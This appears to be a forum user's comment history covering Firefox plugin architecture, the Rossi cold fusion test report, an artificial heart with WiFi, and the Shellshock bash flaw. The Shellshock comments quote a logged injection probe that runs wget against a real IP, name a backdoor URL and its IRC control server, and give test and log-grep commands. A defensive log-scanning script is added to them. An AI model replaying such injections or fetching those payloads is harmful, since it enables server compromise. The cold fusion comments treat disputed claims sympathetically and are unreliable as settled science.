
Clarification on the IP Address Security in Dropbox Case 152

Bennett Haselton writes A judge rules that a county has to turn over the IP addresses that were used to access a county mayor's Dropbox account, stating that there is no valid security-related reason why the IP addresses should be exempt from a public records request. I think the judge's conclusion about IP addresses was right, but the reasoning was flawed; here is a technically more correct argument that would have led to the same answer. Keep Reading to see what Bennett has to say about the case.

Comment Re:plugin-container.exe (Score 1) 400

I guess it could - firefox's plugin-container is compiled for the same arch as the browser itself though (so if you install firefox 32 bits, you'll get the 32 bits plugin-container).

A quick search seems to suggest it would be theoretically possible to have a 64 bits firefox talking to a 32 bits plugin-container loading, say, the flash plugin; it appears however that that would require an IPC bridge between both processes to perform some sort of conversion (this suggests that somehow the way both processes communicate is arch dependent? I don't know enough about xulrunner to confirm).
There's a compatibility layer that apparently exists to do exactly that: nspluginwrapper.

Myself, I tend to avoid the headache and simply run the 32 bits version of Firefox even on an amd64 system.

Comment Re:Any suffiently advanced tech... (Score 3, Insightful) 986

But the "inventor" hooked up the meter, no?

No. The entire experiment was set up by the researchers themselves; the lab has no connection to Rossi, and none of the equipment came from or was set up by him. His only implication was to be here for the initial "fuel" insertion and the ash retrieval at the end, while being monitored (though that's more than enough to be suspicious of the alleged transmutation and suspect some sort of swap - still, it doesn't explain the excess energy).

Comment Re:Hoax (Score 3, Interesting) 986

Oh, he says words which he calls an explanation, but they fly in the face of already-understood theory, and he offers no explanations about why already-understood theory is wrong.

Agreed on this - it should be noted, though, that Rossi is not the only one that claims excess energy and transmutation using these kinds of mechanisms; look up for example the MIT NANOR device (a small scale device that put out excess energy for more than one month straight), or the Mitsubishi transmutation claims in similar devices (later replicated by Toshiba). There are also other companies claiming similar things (Brillouin for one).

If this thing works (and that's obviously a big if), then I'd suspect Rossi discovered this mostly by accident, and that he has no precise idea himself of how it actually produces energy. IIRC, the few initial theories proposed are based on the idea of nano-scale lattices with trapped hydrogen inside; combined with some sort of excitation (EM usually, although not the only one that apparently produced some results) allowing somehow for the Coulomb barrier to be overcome at those scales and for a limited-scale, radiation-less (how ?) fusion to occur.

This is of course all pretty impossible given our current understanding of physics so if it does work somehow, it's wonderful news, even if it cannot be harnessed for energy; because it might lead to new, exciting physics.

Comment Re:Hoax (Score 4, Interesting) 986

I don't see that anybody checked the "reactor" coating materials for rare earth dopants.

Read the report (specifically page 8 and annex 2) - they actually analyzed the device's coating material. It was made of Al2O3 (and this was taken into account in the calorimetry), with no obvious other compounds.

While there are possible calorimetry issues here, it's hard to see an obvious one that would explain such a large measurement error; alumina IR transparency has been considered, as well as IR calibration issues (especially given the imperfect dummy test); both do not appear to be valid criticisms (see my comment here for details).

Given the extraordinary claims, extraordinary evidence is obviously required here; and this report definitely isn't that. Its experimental protocol and the results obtained are however more than enough to warrant further investigation; which may be hard given that this isn't like a "classical" experiment, that can be easily replicated - you basically need Rossi/Industrial Heat (the company that acquired Rossi's device and tech) to provide you with his black box and stay the hell away from the test (this is the first time he actually did that; and even here he couldn't help himself being present for the initial "fuel" insertion and the ash extraction at the end of the experiment - which renders the isotopic changes inevitably suspicious).

Comment Re:They didn't TEST anything... (Score 5, Informative) 986

They looked at the instruments set up by Rossi

Nope, that was true in the first test, not this one. None of the instruments came from or were set up by Rossi. This test didn't occur in his lab, but in a neutral lab with controlled access. He was however present for the loading of the initial "fuel" and the extraction of the ash at the end of the test (which was stupid, and suspicious - especially given the witnessed isotopic changes in the ash).

Even assuming he did some swap on the ash itself, though, it does not explain the witnessed extra heat output (which even with extremely conservative estimates in the paper sets a CoP at ~3.6).
Now, their calorimetry is far from perfect - there were initial concerns about alumina (the device's main material) transparency to IR, for example; those have been put to rest given the fact that the IR camera used works above 7um wavelengths and at those ranges, transparency isn't an issue. Another concern (stressed by other people above) is the whole way the IR camera itself was calibrated and set up - however, the IR cam was a new, never before used one, and they simply tested its calibration. Even if the measures are off due to the bad calorimetry, there is no obvious way it could translate into an error of that magnitude without some other obvious signs of it (like crazy differences between the hotter "segments" of the device and others, colder ones). And once again, they made all of their calculations using very conservative estimates and taking into account all margins of error.

As for the researchers themselves, they are far from disreputable (except maybe for Levi in this specific context); they are engaging their reputation by publishing this and one of them, Hanno Essen, is also the head of the Swedish Skeptics Society and has at least some experience in dealing with crackpots and suspicious "revolutionary" inventions.

This does warrant further research; beyond ad hominem attacks on Rossi, I haven't seen any strong criticism of the experimental protocol that hasn't been quickly debunked (except for the transmutation thing; that could be explained by Rossi doing some sort of swap. It should be noted that he was watched at all times by several people though).

Submission + - New positive independent report for Andrea Rossi's purported cold fusion device

Solozerk writes: The so-called "energy catalyzer", a purported cold fusion reactor device alleged by its inventor Andrea Rossi to be a revolutionary new source of energy, was previously discussed on Slashdot. Now, a new report has been leaked that appears to independently verify those claims. The paper, "Observation of abundant heat production from a reactor device and of isotopic changes in the fuel", describes the evaluation of the device as positive, yielding a COP (Coefficient of Performance) of 3.6. Contrary to previous evaluations of the device, Andrea Rossi was apparently not involved in any way with this one; only providing the device itself.

Comment Only the beginning (Score 5, Informative) 236

It's not the only botnet being constructed, see my comment here - already 653 exploited servers there right now.
This is quite bad - as long as a bash CGI script is found by probing, exploiting only requires putting a bash command in a header such as "Cookie:" for it to be executed. And this is only through HTTP - there are also already other proofs of concept exploiting this through other bash-using services (DHCP servers for example).
You can check if you've been scanned for exploitable CGIs using something like (adjust apache logs path accordingly):

grep cgi /var/log/apache2/access*|egrep "};|}\s*;"

And you can check if your bash is vulnerable using:

env x='() { :;}; echo vulnerable' bash -c 'echo Testing...'

If 'vulnerable' appears, it is.

Comment Re:Can confirm... (Score 2) 318

Another one attempts to download and execute h t t p ://213.5.67.223/jurat , a perl backdoor that'll connect to a control IRC server (46.16.170.158 port 443), presumably so that a botnet can be constructed. It allows for port scanning and DDOSing remote targets based on IRC commands received.

And right now, there are already 560 invisible users connected there... and it grows at quite a pace. The flaw is definitely being exploited in the wild.

Comment Can confirm... (Score 2) 318

Just saw this in the server logs on one of our servers:

82.165.144.187 - - [25/Sep/2014:18:55:59 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 404 392 "-" "() { :; }; /usr/bin/wget 82.165.144.187/bbbbbbbbbbbb"

An attempt at exploiting the vulnerability (trying to wget h t t p : // 82.165.144.187/bbbbbbbbbbbb to confirm the system is vulnerable).
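
An added example, not part of the comments above: a Python pass over Apache combined-format access logs that flags the `() {` function-definition prefix in any logged field, whatever the request path, and records the response status for triage. The log lines are constructed samples using documentation IP ranges, and the function names are this example's own.

```python
import re
from collections import Counter

# Apache "combined": ip ident user [time] "request" status bytes "referer" "agent"
QUOTED = r'"((?:[^"\\]|\\.)*)"'   # quoted field; Apache escapes embedded quotes as \"
COMBINED = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] ' + QUOTED + r' (\d{3}) \S+ ' + QUOTED + ' ' + QUOTED
)
# Vulnerable bash treats an environment value starting with "() {" as a function
# definition, so that prefix is the marker, not the "};" that follows it.
FUNC_DEF = re.compile(r'\(\) \{')

def scan(lines):
    """Return (ip, time, field, status) for each logged field holding the marker."""
    hits = []
    for line in lines:
        m = COMBINED.match(line)
        if not m:
            # Unparseable line: flag on the raw text instead of skipping it.
            if FUNC_DEF.search(line):
                hits.append((line.split(' ', 1)[0], None, 'raw', None))
            continue
        ip, when, request, status, referer, agent = m.groups()
        for name, value in (('request', request), ('referer', referer), ('agent', agent)):
            if FUNC_DEF.search(value):
                hits.append((ip, when, name, int(status)))
    return hits

def by_source(hits):
    """Count hits per client address."""
    return Counter(hit[0] for hit in hits)

def needs_review(hits):
    """Hits where the server did not answer 404, i.e. the requested path existed."""
    return [hit for hit in hits if hit[3] != 404]

# Constructed sample log lines (not taken from a real server).
SAMPLE = [
    '192.0.2.10 - - [25/Sep/2014:18:55:59 +0200] "GET /cgi-bin/status.cgi HTTP/1.1" 404 392 "-" "() { :; }; echo probe"',
    '198.51.100.7 - - [25/Sep/2014:19:02:11 +0200] "GET /index.html HTTP/1.1" 200 5120 "() { :;}; echo probe" "Mozilla/5.0"',
    '203.0.113.5 - - [25/Sep/2014:19:03:40 +0200] "GET /cgi-bin/form.cgi?a=1 HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [25/Sep/2014:19:04:02 +0200] "GET /cgi-bin/test.sh HTTP/1.1" 200 17 "-" "() { :; }; echo probe"',
]

if __name__ == "__main__":
    found = scan(SAMPLE)
    for hit in found:
        print(hit)
    print(by_source(found).most_common())
    print("review first:", needs_review(found))
```

The default combined format records only the request line, Referer and User-Agent, so a payload sent in a header such as Cookie leaves no trace in these logs unless the LogFormat is extended to capture it.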

Comment Re:Predictable (Score 1) 183

The only thing that link proves is that WPA2-PSK is secure as long as you choose a long enough password.

Of course you can capture a handshake and try and bruteforce the password. But as long as said password is long enough, and even with GPU-assisted cracking, you'll die before you even go through a thousandth of the possibility space.
Security doesn't have to be perfect - if it turns out eventually that hardware advances or a flaw in the implementation makes an attack even remotely feasible, then you'll surely be able to update the heart's firmware or even, worst case scenario, to replace it. For the time being, it's good enough. And even if an attack is possible (jamming seems certainly possible, for example, and would prevent adjusting the heart rate for the duration), the device should never obey any command that may put the user at risk - i.e., never go below a certain rate.

Meanwhile, the people this device is implanted in wouldn't even be alive without it. And shit, we're talking about a completely artificial heart, currently being implanted in humans, the first one of which allowed its wearer to last for 76 days (an impressive success by all accounts). This is the stuff of science fiction. The WIFI aspect hardly seems relevant compared to this - and yet 90% of the comments seem to focus on that. How depressing.
